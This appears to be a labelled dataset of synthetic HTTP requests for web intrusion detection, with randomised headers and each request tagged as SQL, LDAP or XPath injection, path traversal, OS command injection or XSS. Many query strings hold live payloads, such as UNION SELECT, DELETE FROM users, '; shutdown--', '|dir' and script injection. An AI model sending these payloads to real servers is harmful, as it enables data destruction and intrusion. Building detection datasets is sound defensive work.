GET /P1O/yt3rj7m-dd-R/rp/np7/vAiooqt/5eaa/deleteERSZ-kqtscriptxYjJ.jpg?o4nnna1t=agn2izalBoh6&pselectGYSY=Cpositiont&relgg6rmesnmhu=cpm4orrvmd&eri=taetgcxst&ehwarYsy=801629&4EeNeetI19=hmailn&4igireso=0678112&xcomNf5trbd=exheotpht&iaeihvnenjhqctu=%27++++OR++++%27%27++++%3D++%27&smlgsuidotrafvw=tt3-&yHrwpahdaua=cN7s1bxz&atsbihb=7&tfise=080935&Q13m2BSbOe.=5311358560 HTTP/1.1
Host: 228.102.33.73
Connection: close
Accept: text/*;q=0.8, image/gif
Accept-Charset: *
Accept-Encoding: *;q=0.4
Accept-Language: *;q=0.7
Cache-Control: no-transform
Client-ip: 143.204.36.23
Cookie: tnCbr4n7ATar= rleId;NlOhdOnp=933;e4p=4052951520
Cookie2: $Version="477"
Date: Tue, 11 Nov 08 02:46:13 CET
ETag: "ofotsShZb@38oZjIsB"
Expect: 100-continue
From: 4Nttn@NaeRods.net
If-Modified-Since: Sun, 05 Mar 06 17:18:13 CET
If-Unmodified-Since: Thu, 14 Jan 10 01:36:26 CET
If-Match: "EUjR03G55pIl1cxiq"
If-None-Match: *
If-Range: Thu, 25 Jan 07 23:32:38 UTC
Max-Forwards: 608
MIME-Version: 7.9
Pragma: ir6n=enfy
Proxy-Authorization: NTLM ZXI5aW5vc2VsdHJadGxldmVnYXJlZWFvYXVrczYxaXhPaXRlOA==
Authorization: Basic aXJvdjpwZGJvdGhM
Range: 7-,552794-,881563-
Referer: http://www.tendAee.gov/rix7/xvzz1ihe.aspx
TE: chunked,deflate
Trailer: TE
User-Agent: Mozilla/5.5 (Windows; U; Win98 6.5; 3e-pe; rv:5.2.4) Gecko/73749978
UA-CPU: PowerPC
UA-Disp: 421,960,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 6544x276
Via: 6.3 185.42.225.104
Transfer-Encoding: gzip
Upgrade: 9sH/0.7, h7C/7.3, a0w3h/0.4
Warning: 209 99.218.44.161 "n5shpLu8ptOeAstrt7u" "Mon, 11 Feb 08 12:06:51 UTC"
X-Forwarded-For: 123.208.82.116
X-Serial-Number: 3139045
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41895
Start - Id: 49174
class: XPathInjection
GET /s6nhaahhsqqrt40/kcZcW8JKu/Meppsleiu/czfHf_Xqoe5N/nn/iuBrs4rez/nanosIivesln1aheh6/vAwPI7D0V/AsofyEteornnd6e81oa/sznmw.php?lebeeidn9kane=bbHti%27++++or+++oh%2Ft5i6S%2Fchild%3A%3Anode%28%29%5Bprocessing-instruction%28%29%3D22%5D+or++%27qt%27+++%3D++%27 HTTP/1.0
Host: www.udijlnmNr.fr
Connection: nslppe
Accept: text/html;q=0.8, audio/*
Accept-Charset: *;q=0.9
Accept-Encoding: 
Accept-Language: *;q=0.4
Cache-Control: max-age=65
Client-ip: 38.175.250.11
Cookie: mfihztew9l0seIj=9
Cookie2: $Version="703"
Date: Tue, 07 Nov 06 14:19:14 CET
ETag: "mOIFkg9nVCC_XPd"
Expect: 100-continue
From: sbgdd@uletat2q.net
If-Modified-Since: Mon, 14 Sep 09 01:55:41 CET
If-Unmodified-Since: Sun, 16 Nov 08 08:04:31 GMT
If-Match: *
If-None-Match: "st4x0Mea.kYgi2.46"
If-Range: *
Max-Forwards: 6
MIME-Version: 2.4
Pragma: Eec='Lhos'
Proxy-Authorization: Basic bnRlbHdoZXc6bnRpZQ==
Authorization: Basic NGk2ZWVsOnJhcm1sSGM=
Range: -695984
Referer: /v3eppee2/spoods/Iuvae6/51shsarh/nsetaam.swf
TE: gzip;q=0.4,trailers,trailers
Trailer: TE
User-Agent: Mozilla/1.2 (X11; U; Open BSD i386 4.5; uh-10; rv:5.3.2) Gecko/40739078
UA-CPU: x86
UA-Disp: 8001,6616,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 290x3654
Via: HTTP/4.0 www.ntai7ec.js, 9.8 www.hiaeS.shtml
Transfer-Encoding: gzip
Upgrade: q8iste/1.0, ici/0.5, qtyr3/1.9, oea/6.5, h1e5st/7.2
Warning: 382 78.125.64.215 "ptlueeneohddxrty" "Fri, 18 Jul 08 15:26:47 UTC"
X-Forwarded-For: 162.244.173.223
X-Serial-Number: 6850092
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 49174
Start - Id: 38280
class: LdapInjection
GET /coeiodsJhtshhf/gvy/sZzK9OdS2d87_wSePfz/eEOKYc/kmzN/7dR9@Pilq3N8b/el2tcHf.E/asVi/tbcegRnsito/tRvtIwV_@z.wAp/nhP8/si8OhhefR.php4?anrphtdtcT=21524&e6npudhtfE1e=m7bGa3ai&racoaeCea=nmeo&ntti=irur%29%28+%7C%28esc7t%3D*%29&Ws14OFNUTK=348945&os3uAIC7Jhs1=bSAy1oinputTmocha&lnectonny=107145&00De9ionszhq=917&V8Kzfwinntv7BUMK=+n&AdTOYaP4l3T=6&erree1aI=Imedgpa&zeeaeiwFllt=he HTTP/1.1
Host: www.cyni.st:1
Connection: close
Accept: audio/x-wav, application/x-tar, video/*
Accept-Charset: windows-1257;q=0.2, iso-2022-jp, iso-8859-2, iso-8859-5;q=0.5
Accept-Encoding: deflate, gzip;q=0.6, gzip, gzip;q=0.1, deflate
Accept-Language: Essh-w, ilvs-Biw, O-twom;q=0.4, eeE8-0e;q=0.5
Cache-Control: no-cache
Client-ip: 227.248.33.223
Cookie: h8n=38
Cookie2: $Version="09"
Date: Sun, 11 Oct 09 10:39:26 UTC
ETag: W/"-Hht-R8UXNeiOEIFFnX"
Expect: ggulohsa
From: v2hr@itzs.com
If-Modified-Since: Fri, 18 May 07 18:16:33 GMT
If-Unmodified-Since: Mon, 23 Oct 06 14:57:08 UTC
If-Match: "5YLzWEbY1zG@z2I"
If-None-Match: "DMm4av6EakS-AZCqD"
If-Range: *
Max-Forwards: 4
MIME-Version: 7.8
Pragma: no-cache
Proxy-Authorization: Digest username="mscm"
Authorization: foo83 eitO=Eectedv
Range: 339-28315
Referer: http://gpthia.uk/elrD1c5e/pa0sI/terspaA/aetcl.nsf
TE: deflate,chunked;q=0.7,deflate
Trailer: Proxy-Authorization
User-Agent: eXvjkzS http://www.oisn.fr
UA-CPU: PowerPC
UA-Disp: 284,6564,16
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 4041x0261
Via: 9.5 www.eAeu.htm, 1.3 www.mR0o.htm
Transfer-Encoding: compress
Upgrade: ndiqn/4.2, cma/1.9
Warning: 420 www.hNfxAea.shtml "ha5earnepwc" "Thu, 20 Jan 05 10:55:49 UTC"
X-Forwarded-For: 189.204.106.18
X-Serial-Number: 830013506
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38280
Start - Id: 35315
class: SqlInjection
GET /ezOp/iphrU-nEQviKgt80/9On9et/sPEs/e@QtiGDv.s7AT1X/gAq/okao7Hi1m/sgatwuSdEsohbttatf/fo.jpeg?etm=oenaonseie&zBgm_MexecEP=%27%29+UNION+ALL+++++SELECT+9++FROM++bh86e2d+++WHERE+++%28%27%27+++%3D+%27&Em=62758 HTTP/1.1
Host: www.hdnbusNos.de
Connection: n8emmTit
Accept: application/rtf;q=0.3
Accept-Charset: *;q=0.3
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-cache
Client-ip: 245.178.69.254
Cookie: iakhtoEi=r ;er=eee
Cookie2: $Version="1"
Date: Mon, 15 Mar 04 22:23:27 CET
ETag: "@IHp0044BDAN5pIZOPDV"
Expect: 100-continue
From: Nlnin@tbpee7c5t.it
If-Modified-Since: Sun, 01 Feb 04 08:04:25 CET
If-Unmodified-Since: Mon, 21 Jan 08 04:45:39 CET
If-Match: *
If-None-Match: *
If-Range: Tue, 14 Feb 06 12:56:53 GMT
Max-Forwards: 54
MIME-Version: 8.1
Pragma: no-cache
Proxy-Authorization: saoa Iaepe=rennc
Authorization: Uenih neueoni=lewhi
Range: 414018-,3-
Referer: /a5dk/6fahel.php4
TE: trailers,gzip
Trailer: Accept-Language
User-Agent: Mozilla/1.0 (Machintosh; U; Mac OS X 6.3; ur-ir; rv:9.4.5) Gecko/99891106
UA-CPU: Sparc
UA-Disp: 420,4746,32
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 198x9357
Via: 6.6 www.sgTtit.gif
Transfer-Encoding: identity
Upgrade: wndma7/6.1, z9unl/1.7, lis/6.7
Warning: 550 www.eCnTyemt.tiff "ton0otomapoagQte" "Fri, 16 Feb 07 04:04:17 CET"
X-Forwarded-For: 111.116.93.90
X-Serial-Number: 37310092312923
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35315
Start - Id: 42136
class: SqlInjection
GET /eEmk4jaPo0r2tdesie/eegGkmCSdjcEtJr/utxiesidisttkoixttm/tEweAfnkte34stwtpdy/nesgg.php4?Km7tz=%3B++++EXEC%28+%27INS%27%2B%27ERT+++++INTO++++users++values%28963%2C%27uaeohkeit%27%2C%27Ne%27++++%29%29 HTTP/1.0
Host: 5.174.90.41
Connection: close
Accept: text/*, audio/basic;q=0.8
Accept-Charset: windows-1251;q=0.0
Accept-Encoding: *;q=0.8
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 157.188.148.246
Cookie: G8.cSn=50;KTWJU0=m
Cookie2: $Version="9"
Date: Tue, 23 Jun 09 24:36:50 UTC
ETag: W/"Ylv1pWoSN89i715H"
Expect: 100-continue
From: yaieolw@dAieet.st
If-Modified-Since: Wed, 19 Oct 05 09:49:50 GMT
If-Unmodified-Since: Sat, 14 Jun 08 19:57:10 CET
If-Match: "uMVGvqYIw@j28IV1"
If-None-Match: "w9koBrhkxhPiTpAurid_"
If-Range: Thu, 18 Aug 05 04:25:51 CET
Max-Forwards: 465
MIME-Version: 0.7
Pragma: 2ac='PNt'
Proxy-Authorization: Digest response="EDaFEE464Cd220549436Ba0ec5F670E1"
Authorization: NTLM b280YmFob2RyZmRyb2FlZG1jdGRhc2g4c3N0c2Uyek5kZG53c2VidWRz
Range: 80-3804,023297-91,09-
Referer: /9ir9yaey.php
TE: trailers
Trailer: Range
User-Agent: Mozilla/2.7 (compatible; MSIE 0.7; Windows NT; 7gRe; Tterpho; l4zr1p8wa)
UA-CPU: StrongARM
UA-Disp: 1126,087,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 929x052
Via: FTP/1.3 www.gIebsn.shtml, 2.8 219.149.254.52, FTP/7.6 88.244.229.66
Transfer-Encoding: compress
Upgrade: dct/0.8, isti/6.6, rDb4l/1.0
Warning: 795 www.ocntp.jpg "satrsjzkse" "Sat, 22 Aug 09 08:49:22 CET"
X-Forwarded-For: 229.231.134.44
X-Serial-Number: 45705
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42136
Start - Id: 45749
class: PathTransversal
GET /g-VQ7JvUaTTk/ewX2eV/nyw_Wi5F.gif?Alog5s4vLimg=b9&_7@VM6r04mJ=224&ty5t=8%26%2F%3C&rrAtht8inoxbn=yor4ekten&ohmaori15miop=%2B%3EGt&estnuewEa4WgaDs=n%3E&ekcqodmErggmawz=24&YX5acceptPEQ=%2F..%2F..%2F..%2FInetpub%2Fiissamples%2Fie%2Fvein%2Fliitst%2Farvetondma.mdb HTTP/1.1
Host: 218.0.10.0
Connection: datsi
Accept: text/html;q=0.2
Accept-Charset: *
Accept-Encoding: *;q=0.1
Accept-Language: *;q=0.3
Cache-Control: max-stale=4
Client-ip: 55.130.114.2
Cookie: tfWrecg=59;nROtxwrsmsqae=tdL;oywl=Ota;dew=die+
Cookie2: $Version="51"
Date: Fri, 15 Aug 08 14:44:27 UTC
ETag: W/"XOfNqF66G.unu7sQ.q1p"
Expect: 100-continue
From: eyebc4et@nriRuu.de
If-Modified-Since: Thu, 12 Jan 06 10:46:25 CET
If-Unmodified-Since: Sat, 14 Nov 09 08:05:22 GMT
If-Match: *
If-None-Match: *
If-Range: Tue, 19 Dec 06 15:46:04 CET
Max-Forwards: 5868
MIME-Version: 7.5
Pragma: no-cache
Proxy-Authorization: Digest uri=/beS0.doc
Authorization: Digest response="094fe2ECEd1ec8875845BBFbA6Aae73d"
Range: -500252,934-3694
Referer: /liKt5/emwxd/eimi.mspx
TE: chunked,gzip;q=0.8,trailers
Trailer: Range
User-Agent: Mozilla/8.0 (Windows; U; Win98 1.4; ki-uo; rv:7.8.5) Gecko/21068153
UA-CPU: StrongARM
UA-Disp: 0244,7553,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 337x559
Via: saehs/0.0 www.fcaW2ptt.shtml:909
Transfer-Encoding: 3Epmo
Upgrade: lje/1.7, sts73/6.3, 4d9i/5.5, t3nzwt/8.9, san8/9.0
Warning: 138 195.65.50.48 "amRyeeev4t" 
X-Forwarded-For: 187.241.210.252
X-Serial-Number: 82558
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45749
Start - Id: 42027
class: SqlInjection
GET /Ue/wpWNFyPHtpT@DMtaFs/ehvJOnjue/rOk/sx.msf?gicar2s=%27%3B++shutdown-- HTTP/1.0
Host: www.oaepnae.it
Connection: keep-alive
Accept: */*
Accept-Charset: iso-8859-1, cp-936;q=0.3
Accept-Encoding: compress, gzip;q=0.6, compress;q=0.6
Accept-Language: d-as0erel;q=0.3, osdfl-crtOt, x-hesithw;q=0.9
Cache-Control: min-fresh=97
Client-ip: 144.52.64.113
Cookie: VESOaBBvfJg=rS.0KXr;RFITvgahYMBZ=~g9tr A
Cookie2: $Version="334"
Date: Thu, 15 May 08 10:34:28 GMT
ETag: "P@9@6gx8w_ydb.Mba.1"
Expect: 100-continue
From: eliqs@octere.st
If-Modified-Since: Wed, 13 Apr 05 03:35:36 GMT
If-Unmodified-Since: Wed, 26 Apr 06 18:25:56 GMT
If-Match: "xcD6@VjuN.@B1bqOeq"
If-None-Match: "9H5W6dYxVcKJ1MvM9"
If-Range: "gghkTF6AUe5h4pJ"
Max-Forwards: 75
MIME-Version: 9.3
Pragma: no-cache
Proxy-Authorization: Digest response="8EBC6AbfdcBAA2fEA94dfDD61baEC0de"
Authorization: Digest opaque="4venij"
Range: 4936-0,-6636
Referer: /ansa0/otinEe/rvees/lsgg.jpg
TE: trailers,gzip;q=0.0
Trailer: Date
User-Agent: Mozilla/3.1 (Windows; U; Win 9x 3.2; nn-th; rv:9.4.2) Gecko/94914781
UA-CPU: 68000
UA-Disp: 7502,392,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 422x9399
Via: HTTP/1.6 211.99.188.186:4962, 9.0 89.96.129.153:48917, FTP/3.8 www.u3lie.shtml
Transfer-Encoding: deflate
Upgrade: tomgi/1.4, rQn9a/6.1, etcrc/1.8
Warning: 583 www.veos.jpg "tedi" 
X-Forwarded-For: 128.48.152.130
X-Serial-Number: 063116688396663
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42027
Start - Id: 43706
class: OsCommanding
GET /ssi/envout.bat?|dir%20..............1 HTTP/1.0
Host: www.eA3nteBdw.biz
Connection: yltnapii
Accept: application/x-tar, application/*
Accept-Charset: *;q=0.0
Accept-Encoding: compress, deflate;q=0.7
Accept-Language: *;q=0.5
Cache-Control: Rioyio1='h'
Client-ip: 131.122.223.243
Cookie: rgipekemUegi=otcaUOaeRre3earab;4Une=216;elfekenohxowe=480
Cookie2: $Version="1"
Date: Mon, 21 Sep 09 06:43:48 UTC
ETag: "-4D7Jo4QjAO6o6dlRPcD"
Expect: 100-continue
From: nnlogc@ewfasl3.ch
If-Modified-Since: Sun, 15 Jul 07 19:27:52 CET
If-Unmodified-Since: Tue, 27 Apr 10 06:11:31 UTC
If-Match: *
If-None-Match: "2sJzH8YrLyPo3VoV"
If-Range: Sat, 22 Apr 06 10:57:09 UTC
Max-Forwards: 20
MIME-Version: 8.9
Pragma: no-cache
Proxy-Authorization: tsoaT mieOyd9e=mWtlue
Authorization: NTLM YWxvcjhMbm5ueGV0ZWFDbWVuY2VlZ2lvdG1TcGJieWV2dGxsaWhu
Range: 251-3,844750-,3500-
Referer: http://www.esnorwm.gov/ofoOs/easucl.tiff
TE: trailers,trailers,gzip;q=0.7
User-Agent: Mozilla/8.1 (compatible; MSIE 1.8; Unix; ekem; N6eya)
UA-CPU: 68000
UA-Disp: 911,720,8
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 5641x613
Via: FTP/3.9 50.200.48.127
Transfer-Encoding: onsdi; RteJ=0Swthec
Upgrade: HweTi/0.0, tten/3.8, hSbn/1.3, sniu/8.5, tfxay/0.5
Warning: 907 www.nh4nvqdc.htm "leoeodrceto" "Thu, 06 Dec 07 08:39:30 UTC"
X-Forwarded-For: 253.164.33.60
X-Serial-Number: 181822248668347
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 43706
Start - Id: 47540
class: XSS
GET /awJIE7H4tm43MS/hepers/rtoaVbeivdes/tv/QY/y@kGImJE/hYEixzD.JJZUt/ko8j7afRH.bin?-uu3Cv=8825738&o8lw=ywdZirAne&oam=59585895&waa=e+op&riztuosa=%3Cimg+++++src%3D%26%7B%5Balert+++%28%27oSs4ezem%27%29%3B%5D%7D%3B++%3E&cs=d.c.%40iblLAPJ&v8FSghret88e=300192&tioayhpB=0&boGs=s%2FneheoeTlperlsn&NlCT_htpassAMGeLnode=18271&locationoZLwp-CtWQiFa=63467 HTTP/1.0
Host: 124.27.80.229
Connection: tlnnchew
Accept: */*;q=0.1
Accept-Charset: cp-936, windows-874
Accept-Encoding: identity;q=0.2, gzip;q=0.8, deflate, gzip
Accept-Language: uo6-sQs;q=0.3, sggGea-peoo;q=0.2, igLo-entsaYe;q=0.7
Cache-Control: only-if-cached
Client-ip: 32.10.53.131
Cookie: dmreo=eLecu;52blc9lb8nessid=i%rv
Cookie2: $Version="61"
Date: Wed, 08 Aug 07 03:25:44 CET
ETag: "_JQz@6_kdlKXmlwio3"
Expect: Aaakre3t=bPm8Duh;h4pbg6
From: sevLsg9@hooNmu.fr
If-Modified-Since: Mon, 13 Mar 06 22:45:17 CET
If-Unmodified-Since: Mon, 03 Sep 07 07:00:15 UTC
If-Match: "SlYExWD.61oQyU7SHA"
If-None-Match: "nlPvheeUYn6NMvD."
If-Range: "zbD6bwp@EhO9Zn0"
Max-Forwards: 86
MIME-Version: 0.8
Pragma: no-cache
Proxy-Authorization: Digest cnonce="zlsmsen9"
Authorization: bMhsg esQt=Vnate6
Range: 8094-,77-91254,-8945
Referer: /swhtbA/rouQKt/1ywjp3eO/m7tne/3nef.sh
TE: chunked
Trailer: If-None-Match
User-Agent: rqhIaor
UA-CPU: PowerPC
UA-Disp: 050,2452,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 2187x3503
Via: nee2iV/8.8 www.lsure.tiff, 1.4 253.238.240.73
Transfer-Encoding: identity
Upgrade: ehzL/0.2, mtlah/0.2, jsco/5.4, toi/4.5
Warning: 992 www.4eiian.js "meeteeolpwgufO" "Tue, 02 Mar 10 02:39:00 CET"
X-Forwarded-For: 112.231.125.157
X-Serial-Number: 870651819
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47540
Start - Id: 41750
class: SqlInjection
GET /egE/rssdyD1heiasi/cjrtne6zed/afH046s0mn/eLfpJ1Wh/bR-eLfH1wQ@b-ME/slwhnPNArEvx3lyY@/3RRbzEdRdSBdXo/iinwth7nctr22aaygOE/dmg-irBdg.css?n77Kirorn8=582&4neea=eba4laf9DSr&reoe=iooEr%27++%29%3B+++++DELETE+++FROM++users+++WHERE+upper%28username%29+%3D+++++upper%28%27admin&eanepezfIIe=53&_ngGf.=r8va&zyNtmsdco6di=e%40Aisdd6v&ra2aofuDAVA=ht&Etnq=ieetbiniYtmptelnet1thtmpoo HTTP/1.0
Host: 139.141.231.129
Connection: dnn2e
Accept: audio/x-wav
Accept-Charset: iso-8859-8-i, x-mac-turkish;q=0.1, x-mac-hebrew, iso-8859-8;q=0.5, iso-8859-9
Accept-Encoding: compress
Accept-Language: th-lsBlrn;q=0.5
Cache-Control: only-if-cached
Client-ip: 122.67.58.101
Cookie: Angr62iado=tta;i4heotit7Eaua=244287;7riilaah=ybdenii 8uost;eaon=eQsv7rJ3is;cer1u4oemearals=t8l
Cookie2: $Version="992"
Date: Tue, 20 Nov 07 13:58:19 CET
ETag: "UVxosaB2xCH2mpUKt0jR"
Expect: crar=tsunz
From: lehFo@eioiwni.cz
If-Modified-Since: Sun, 27 Jan 08 13:17:56 UTC
If-Unmodified-Since: Thu, 18 Mar 10 13:19:58 CET
If-Match: "-Ls_agbPEl6Cu_f1aFi"
If-None-Match: *
If-Range: Fri, 24 Mar 06 20:06:15 UTC
Max-Forwards: 68
MIME-Version: 8.7
Pragma: no-cache
Proxy-Authorization: Basic cGI2bXI6c2l0eHNubVM=
Authorization: Basic OWRzd2VsaXQ6cmFpaTFTd2U=
Range: -69404,-1
Referer: /siea/rsimS.gif
TE: trailers
Trailer: Cache-Control
User-Agent: nVG1DW http://www.rnnon.ch
UA-CPU: 68000
UA-Disp: 570,952,32
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 0666x357
Via: adhdw/2.9 www.dbak6.png, 2.7 122.247.120.158:732, 5.4 www.dy2a.html
Transfer-Encoding: deflate
Upgrade: mer/2.9, hitWop/2.4, vtjw/1.7, otte/3.2
Warning: 607 www.YSrrvdrE.js "aoDrnimr" "Wed, 02 Nov 05 02:56:53 UTC"
X-Forwarded-For: 208.165.185.87
X-Serial-Number: 81915611891
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41750
Start - Id: 37566
class: LdapInjection
POST /tiwiMz4MLunZl6Mm/unvdzOrRs/elfTech/tX.js? HTTP/1.1
Content-Length: 155
Content-Language: nbomgre,2alekw,leAwt
Content-Encoding: identity
Content-Location: /rinEo0/dtnOyn/tabhHbrg.txt
Content-MD5: cnlObnQxZUZOeXJudElvZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 14 May 08 16:18:50 CET
Last-Modified: Thu, 24 Apr 08 03:40:27 UTC
Host: www.Zkrkh.st
Connection: obtpr
Accept: */*;q=0.8
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.1
Cache-Control: min-fresh=81
Client-ip: 7.129.128.89
Cookie: M6iAvsesy2rsh3=e;ie3oahc=tonnuahlazsystemSm5;yaofig4r=g1Eh_AbqpFy;open_AWjrin=dMdptminifDtap08;Snz8smbm=091
Cookie2: $Version="03"
Date: Fri, 01 Jul 05 02:01:01 CET
ETag: W/"opjc3ToLOFC@rsjI2Os"
Expect: 100-continue
From: Stnfsrr@eacmtr.gov
If-Modified-Since: Sun, 13 Jun 04 02:37:47 CET
If-Unmodified-Since: Tue, 02 Nov 04 05:12:08 UTC
If-Match: *
If-None-Match: "OLADb.qgfnfqTeE0"
If-Range: Mon, 16 May 05 05:58:40 GMT
Max-Forwards: 526
MIME-Version: 8.8
Pragma: cRrro=slgpp
Proxy-Authorization: Digest opaque="rtsrac"
Authorization: NTLM aWVubmxHb3JldmZSZ2lsMWlhTmhDbHNxaGk3ZGhhb0R1b2lvTDh4dnNjTk1lWW90
Range: -74,-46159,08-370587
Referer: /Oseau.wav
TE: deflate,chunked;q=0.5,trailers
Trailer: If-None-Match
User-Agent: Mozilla/6.4 (Machintosh; U; PPC Mac OS X 9.0; ra-se; rv:3.3.1) Gecko/15423005
UA-CPU: PowerPC
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 299x8794
Via: 8.6 www.p7de4.jpg, 2.0 171.145.210.220, 5.8 3.142.47.220
Transfer-Encoding: deflate
Upgrade: etMr/2.7
Warning: 065 105.103.99.69:35 "ltome" 
X-Serial-Number: 01594707388200191754
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

-Qtf=aofbin=imse&renpsbdW=awevalh|sUh&E1s7zhzitsh=oiqf eneeih$autoexech&Deedtdhadi=uua&ncnou5nTSodr=")(targetfilter=(o=NetscapeRoot))

End - Id: 37566
Start - Id: 48785
class: XPathInjection
GET /iahet8tgenste01dE/8ecatMThaving0/uTwidJg/e_@HgGX2/ug2WebgbRK_WF7Sy/u18/nU/d7rcGeDBqEgp/tdjbFGmFhUp7iWZ/swihcrec/eeirnro8s.asp?d_4.RRg@=b%409S&n6nto9e=zVhU_GBy&V7bo=y9autoexec&ooeebEmtaEua=zlt53mesrovksicot&bTbtin5U1Oo47=2IsprcQitith&aorma=9033+++++or++++count%28path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D%28%28i%2Bj%2Bk%2Bl%2B1%29%5D++++%7C++path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1++++or+++++524%3D&srNnEpRRdtifrrm=mfh&hrTec=m%27ftpgteSbap&rsvirie=etbuc HTTP/1.1
Host: 155.157.192.125
Connection: close
Accept: audio/basic;q=0.4
Accept-Charset: utf-8;q=0.8, us-ascii, iso-10646-ucs-2;q=0.1
Accept-Encoding: 
Accept-Language: sWpek-laI, moibE-derm, ae0-e;q=0.0, hffGdos-ai;q=0.5
Cache-Control: no-transform
Client-ip: 132.160.12.174
Cookie: airovEi2bi=eoSK;ciIleii4=49821
Cookie2: $Version="33"
Date: Mon, 19 Jan 09 06:25:24 GMT
ETag: "t_wbub8hlouKz7ojG"
Expect: 100-continue
From: iinongn@mnxs.it
If-Modified-Since: Wed, 30 Jan 08 04:28:44 CET
If-Unmodified-Since: Thu, 02 Mar 06 22:14:27 CET
If-Match: "APQ6Ske@TeuPoC.3I"
If-None-Match: "3v1xc3Y@aP5V96lDrok"
If-Range: "Hht5g1_0RxjQCKvG9"
Max-Forwards: 0
MIME-Version: 7.6
Pragma: no-cache
Proxy-Authorization: bfgi rtRa=dsun
Authorization: Basic dTBzcmJsc2I6dHdzYXRy
Range: -2670
Referer: http://s8feu9os.it/b0trx6n/bahcr0e.php3
TE: chunked
Trailer: If-Match
User-Agent: Mozilla/4.8 (X11; U; Open BSD i586 7.8; 9l-no; rv:4.1.6) Gecko/18961621
UA-CPU: Sparc
UA-Disp: 065,1900,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 0640x829
Via: HTTP/5.7 www.ek1n.html, 8.6 80.28.150.184
Transfer-Encoding: deflate
Upgrade: Ewf/6.2, nem/5.8, anr/8.4
Warning: 022 17.182.45.11:3 "otrr6o" "Sun, 18 Jun 06 04:34:44 GMT"
X-Forwarded-For: 29.255.158.60
X-Serial-Number: 91085998772983
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48785
Start - Id: 42861
class: OsCommanding
GET /hkH5hytcWqXXC0/bx3/60hptl68.css?N8=7orntIsteh&nrz=twtblo%5Dvna9ihsock_stream&81rzk=%7C++++dir++..%5C%5C..%5C%5C..%5C%5C..%5C%5C..%5C%5C..%5C%5C..%5C%5C++%2C&qFSsk=Ehxdsnl4txyb&ondbaiLtte=037613&lsnenewiy6m0e=tc&emyeoglOi6gao=ieantn HTTP/1.0
Host: www.bcEn9se36f.com
Connection: close
Accept: audio/x-wav
Accept-Charset: iso-8859-4, x-mac-roman;q=0.5
Accept-Encoding: 
Accept-Language: *;q=0.7
Cache-Control: max-stale
Client-ip: 130.238.67.29
Cookie: 8EX0E3kT=wUdndgihiseimainss;ueliwdn=61;etEn=wioerrditaedaofsrf;l4orqh=iqmbyV3Rx
Cookie2: $Version="344"
Date: Fri, 30 Jul 04 07:09:47 UTC
ETag: "HnExqP@.ONn5WYu362o"
Expect: ecdm
From: l6tz5hd@ruglhe.be
If-Modified-Since: Sat, 27 Oct 07 21:07:32 UTC
If-Unmodified-Since: Tue, 12 Jun 07 22:01:41 UTC
If-Match: *
If-None-Match: "175dDCQ1MMMyeNUTI"
If-Range: Mon, 14 Nov 05 17:51:49 CET
Max-Forwards: 2
MIME-Version: 7.9
Pragma: no-cache
Proxy-Authorization: Basic YXNmZDp0bW84dHo=
Authorization: Digest algorithm=rcTson
Range: 220375-
Referer: http://n4oaE5.gov/sehceNv/n8otesn/pa0ni/tAzjEa9.swf
TE: trailers,trailers
Trailer: Cache-Control
User-Agent: Mozilla/2.0 (X11; U; Solaris 8.0; dt-ri; rv:2.6.3) Gecko/86024720
UA-CPU: x86
UA-Disp: 0286,0560,8
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 625x3364
Via: HTTP/7.7 www.erkth.tiff, 5.4 www.monrr.css, FTP/7.5 148.61.28.128
Transfer-Encoding: identity
Upgrade: gds/3.0, ehewef/0.6, eator/3.4, mwnet/5.2, hnta/0.2
Warning: 322 www.3aaua.png "dnycjwts1Uhnsohdc" 
X-Forwarded-For: 209.98.157.41
X-Serial-Number: 646833
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42861
Start - Id: 45044
class: PathTransversal
PUT /hhhot/tSTocKM/r6g6PvceiNhdt/0ep1c/4MrFW/FpEb18YgmKQ/ilcEnEdn/eped3ie9Er/oeviO47@6lSurk82vp.css? HTTP/1.0
Content-Length: 256
Content-Language: htrafb,3nzsacr
Content-Encoding: gzip
Content-Location: http://s54esfe.biz/4baea/fxeh.rar
